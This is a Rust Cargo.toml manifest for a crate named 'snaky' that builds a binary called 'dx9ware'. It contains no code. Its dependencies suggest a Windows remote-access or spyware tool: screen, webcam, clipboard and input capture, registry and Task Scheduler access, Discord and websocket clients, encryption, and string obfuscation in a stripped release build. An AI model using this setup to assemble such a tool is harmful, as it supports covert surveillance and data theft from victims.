[package]
name = "snaky"
version = "0.2.6"
edition = "2021"

[[bin]]
name = "dx9ware"
path = "src/main.rs"

[target.'cfg(target_os = "windows")'.dependencies]
winapi = { version = "0.3", features = ["winbase", "wincon", "winuser", "handleapi", "winnt", "securitybaseapi", "winspool", "wingdi", "processthreadsapi", "libloaderapi"] }
windows-volume-control = "0.1"
windows = { version = "0.59", features = [
    "Win32_Foundation",
    "Win32_UI_WindowsAndMessaging",
    "Win32_System_LibraryLoader",
    "Win32_Graphics_Direct3D11",
    "Win32_Graphics_Dxgi",
    "Win32_Graphics_Dxgi_Common",
    "Win32_System_Com",
    "Win32_System_SystemServices",
    "Win32_System_WinRT",
    "Win32_Media_MediaFoundation",
    "Win32_UI_Shell",
    "Win32_System_Com_StructuredStorage",
    "Win32_System_TaskScheduler",
    "Win32_Storage_FileSystem",
    "Win32_System_Variant",
    "Win32_System_Ole",
    "Win32_Security_Cryptography",
    "Win32_Security"
] }

[dependencies]
zeroize = { version = "1.8", features = ["derive"] }
clap = { version = "4.5", features = ["derive"] }
# twilight-gateway = "0.16" (Removed for Token-Less architecture)
twilight-model = "0.16"
twilight-util = { version = "0.16", features = ["builder"] }
tokio = { version = "1.0", features = ["full"] }
once_cell = "1.8"
serde = { version = "1.0", features = ["derive"] }
serde_json = "1.0"
reqwest = { version = "0.12.23", features = ["json"] }
futures = "0.3"
tracing = "0.1"
get_if_addrs = "0.5.3"
tracing-subscriber = "0.3"
async-trait = "0.1"
anyhow = "1.0"
aes-gcm = "0.10"
rand = "0.8.5"
base64 = "0.22.1"
hex = "0.4"
sysinfo = "0.29.0"
screenshots = "0.5.0"
chrono = { version = "0.4", features = ["serde"] }
clipboard-win = "5.4.1"
zip = "0.6.0"
walkdir = "2.3"
gethostname = "0.4.3"
winreg = "0.55.0"
regex = "1"
uuid = { version = "1.0", features = ["v4"] }
winresource = "0.1"
hf = "0.3.0"
nokhwa = { version = "0.10", features = ["input-native"] }
image = { version = "0.25", features = ["default-formats"] }
lazy_static = "1.5.0"
obfstr = "0.4.4"
windows-capture = "1.5.0"
whoami = "1.5.0"
tokio-tungstenite = { version = "0.24", default-features = false, features = ["connect", "native-tls"] }
enigo = "0.3"
http = "1.0"
futures-util = "0.3"
hmac = "0.12"
sha2 = "0.10"


[build-dependencies]
winresource = "0.1"
anyhow = "1.0"
hex = "0.4"
image = { version = "0.25", features = ["default-formats"] }
aes-gcm = "0.10"
rand = "0.8"
serde = { version = "1.0", features = ["derive"] }
serde_json = "1.0"
sha2 = "0.10"
chrono = "0.4"
base64 = "0.22"
hmac = "0.12"

[profile.release]
opt-level = "z"
lto = true
codegen-units = 1
panic = "abort"
strip = true
debug = false
split-debuginfo = "off"
incremental = false
overflow-checks = false
